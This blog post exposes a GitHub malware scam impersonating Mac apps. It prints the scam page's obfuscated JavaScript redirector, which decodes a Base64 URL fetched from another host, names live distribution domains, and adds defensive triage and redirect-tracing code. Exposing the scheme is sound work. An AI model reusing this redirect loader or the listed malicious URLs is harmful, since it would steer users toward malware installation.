Previous: Safari 26 changed address bar copying Articles index Jeff Johnson (My apps, PayPal.Me, Mastodon)
September 27 2025
First reported a few weeks ago on Reddit and on Michael Tsai’s blog, this scam unfortunately continues unabated. My own app StopTheMadness Pro has been impersonated on GitHub at least twice. Although a repository that I discovered September 16 was subsequently removed and now returns 404 not found (with no public notice to visitors from GitHub that this was formerly a malware scam), another StopTheMadness Pro copycat is still live on GitHub as of the publication of this blog post.
The search phrase “for macOS” on GitHub reveals countless such fakes, pretending to be well-known Mac apps such as 1Blocker, Airfoil, BBEdit, Figma, Little Snitch, Malwarebytes, OmniOutliner, SoundSource, and VLC Media Player. This is clearly the work of a single person or group, because every repository follows the exact same template and technique. And there’s always a blatant “SEO Keywords” section on the page, stuffed with search phrases in order to game search engine results, piggybacking on the prominent ranking that GitHub pages already enjoy in search engines.
Each scam repository was created by a separate anonymous GitHub user who joined recently, within the last month or two. There’s often a support email address at the top of the page, but the email address is fake and includes the name of the app in the domain to lend legitimacy to the scam.
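The template traits described above (an “SEO Keywords” section, a support address whose domain embeds the app’s name, a download link hosted on a github.io page belonging to some other user) are mechanical enough to check automatically. The following is an added example, not code from this post or from GitHub: it triages a README against those three traits. The README text, the repository owner name and the e-mail address are constructed for the example; the heuristics only encode what the post describes.

```javascript
// Added example (not from the original post): triage a GitHub README for the
// template traits the post describes. SAMPLE_README is constructed here; the
// repo owner, e-mail address and github.io user are hypothetical.

const SAMPLE_README = `
# StopTheMadness Pro for macOS

Support: support@stopthemadness-pro-app.com

[Download](https://someone-else.github.io/.github/stopthemadness)

## SEO Keywords
stopthemadness pro mac download, stopthemadness pro free, safari extension crack
`;

// Normalise an app name to the letters/digits we expect to find inside a
// look-alike domain ("StopTheMadness Pro" -> "stopthemadnesspro").
function squash(name) {
  return name.toLowerCase().replace(/[^a-z0-9]/g, "");
}

// True when any e-mail domain in the README embeds the app name.
function supportDomainMimicsApp(readme, appName) {
  const target = squash(appName);
  const emails = readme.match(/[\w.+-]+@[\w-]+(?:\.[\w-]+)+/g) || [];
  return emails.some((e) => squash(e.split("@")[1]).includes(target));
}

// True when the README contains a heading whose text is "SEO Keywords".
function hasSeoKeywordsSection(readme) {
  return /^#+\s*SEO\s+Keywords\s*$/im.test(readme);
}

// github.io user names linked from the README that are not the repo owner.
function foreignGithubIoUsers(readme, repoOwner) {
  const users = new Set();
  const re = /https?:\/\/([a-z0-9-]+)\.github\.io\//gi;
  let m;
  while ((m = re.exec(readme)) !== null) {
    const user = m[1].toLowerCase();
    if (user !== repoOwner.toLowerCase()) users.add(user);
  }
  return [...users];
}

// One finding per trait; three findings means the README matches the whole
// template described in the post.
function triageReadme(readme, { appName, repoOwner }) {
  const findings = [];
  if (hasSeoKeywordsSection(readme)) findings.push("seo-keywords-section");
  if (supportDomainMimicsApp(readme, appName)) findings.push("lookalike-support-domain");
  const foreign = foreignGithubIoUsers(readme, repoOwner);
  if (foreign.length) findings.push(`download-hosted-by-other-user:${foreign.join(",")}`);
  return findings;
}

console.log(triageReadme(SAMPLE_README, { appName: "StopTheMadness Pro", repoOwner: "fresh-account-42" }));
```

None of these traits is proof on its own; a legitimate project can link to a contributor’s github.io page. The value is in the combination, and in running it across the results of a GitHub search rather than by hand.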
The download link goes to a GitHub page of a different anonymous GitHub user from the one who created the repository; a huge number of fraudulent GitHub accounts are involved in this scam. The linked page, for example https://thynizaudin.github.io/.github/stopthemadness, contains some JavaScript:
<script>
  (async function () {
    try {
      // Fetch a small JSON "config" from yet another GitHub Pages site.
      const res = await fetch(
        "https://valbonau.github.io/.github/valbo.nau"
      );
      if (!res.ok) throw new Error(`Config HTTP ${res.status}`);
      const { c } = await res.json();
      // The real destination is only present Base64-encoded.
      const url = atob(c);
      if (!/^https?:\/\//.test(url)) throw new Error("Invalid URL");
      window.location.href = url;
    } catch (e) {
      console.error(e);
    }
  })();
</script>
This script loads a URL from, you guessed it, yet another anonymous GitHub account.
{ "c": "aHR0cHM6Ly9wb3BraW5zcG9wLmNvbS8=" }
The result is just some JSON containing a Base64-encoded URL, such as https://popkinspop.com/, which returns an HTTP 302 redirect, to https://volt-apps.com/ewer-lest.html for example. This page gives you the option to “install” the app via Terminal—along with an instructional video!—or download a disk image. The download link goes to a URL such as https://alhodooa.com/get.php?call=stack for example. Note that they claim to be a “Verified Publisher.” Either way, through several more layers of indirection, the victim will eventually run a mysterious Mach-O executable, which I haven’t analyzed but which no doubt is up to no good. I’ll leave malware analysis to security researchers such as Patrick Wardle.
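Because the chain above is config blob → Base64 URL → 302 → landing page, an analyst can resolve it without ever opening the landing page in a browser. The following is an added example, not code from the post or from the scam pages: it performs the same decode-and-validate step as the page script and then walks every 3xx hop, returning the list of URLs as indicators. The network is replaced by a constructed table of responses built from the hosts named in the post; nothing is contacted, and the response bodies are made up for the example.

```javascript
// Added example (not from the original post): decode the scam's config blob
// the way the page script does, then walk the redirect chain offline and
// record every hop. FAKE_NET is a constructed stand-in for the network; the
// URLs come from the post, the bodies and headers are made up here.

const FAKE_NET = new Map([
  ["https://valbonau.github.io/.github/valbo.nau",
   { status: 200, body: JSON.stringify({ c: "aHR0cHM6Ly9wb3BraW5zcG9wLmNvbS8=" }) }],
  ["https://popkinspop.com/",
   { status: 302, headers: { location: "https://volt-apps.com/ewer-lest.html" } }],
  ["https://volt-apps.com/ewer-lest.html",
   { status: 200, body: "<html>Verified Publisher ... install via Terminal ...</html>" }],
]);

// Minimal fetch look-alike over FAKE_NET. Redirects are deliberately NOT
// followed, so every hop is visible to the caller.
async function offlineFetch(url) {
  const r = FAKE_NET.get(url);
  if (!r) return { ok: false, status: 404, headers: new Map(), text: async () => "" };
  return {
    ok: r.status >= 200 && r.status < 300,
    status: r.status,
    headers: new Map(Object.entries(r.headers || {})),
    text: async () => r.body || "",
  };
}

// Same decode-and-validate step as the page script, kept pure so it can be
// tested. Buffer.from(..., "base64") plays the role of the browser's atob().
function decodeConfig(jsonText) {
  const { c } = JSON.parse(jsonText);
  const url = Buffer.from(c, "base64").toString("utf8");
  if (!/^https?:\/\//.test(url)) throw new Error("Invalid URL");
  return url;
}

// Walk from the config URL through every 3xx and return the hop list.
// maxHops caps the walk so a redirect loop cannot run forever.
async function walkChain(configUrl, fetchImpl = offlineFetch, maxHops = 10) {
  const hops = [{ url: configUrl, kind: "config" }];
  const res = await fetchImpl(configUrl);
  if (!res.ok) throw new Error(`Config HTTP ${res.status}`);
  let url = decodeConfig(await res.text());
  for (let i = 0; i < maxHops; i++) {
    const r = await fetchImpl(url);
    if (r.status >= 300 && r.status < 400 && r.headers.has("location")) {
      hops.push({ url, kind: `redirect-${r.status}` });
      // Resolve relative Location headers against the current URL.
      url = new URL(r.headers.get("location"), url).href;
      continue;
    }
    hops.push({ url, kind: `final-${r.status}` });
    return hops;
  }
  throw new Error("Too many hops");
}

walkChain("https://valbonau.github.io/.github/valbo.nau")
  .then((hops) => console.log(hops.map((h) => `${h.kind}: ${h.url}`).join("\n")));
```

Swapping offlineFetch for a real fetch with `redirect: "manual"` turns this into a live resolver, but do that from an isolated analysis host: the final page is the one that hands the victim the Terminal command and the disk image, and the Mach-O it delivers is exactly what you do not want executing on a workstation.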
This scam on GitHub is running amok. I’ve reported a few of the fakes myself to GitHub, but I can’t keep up, and that’s not my job. GitHub and Microsoft, the owner of GitHub, need to take decisive and comprehensive action to stop the spread of malware on their platform. Most concerning, I think, is the apparently unlimited ability of an attacker to create and deploy legions of anonymous new GitHub accounts for nefarious purposes.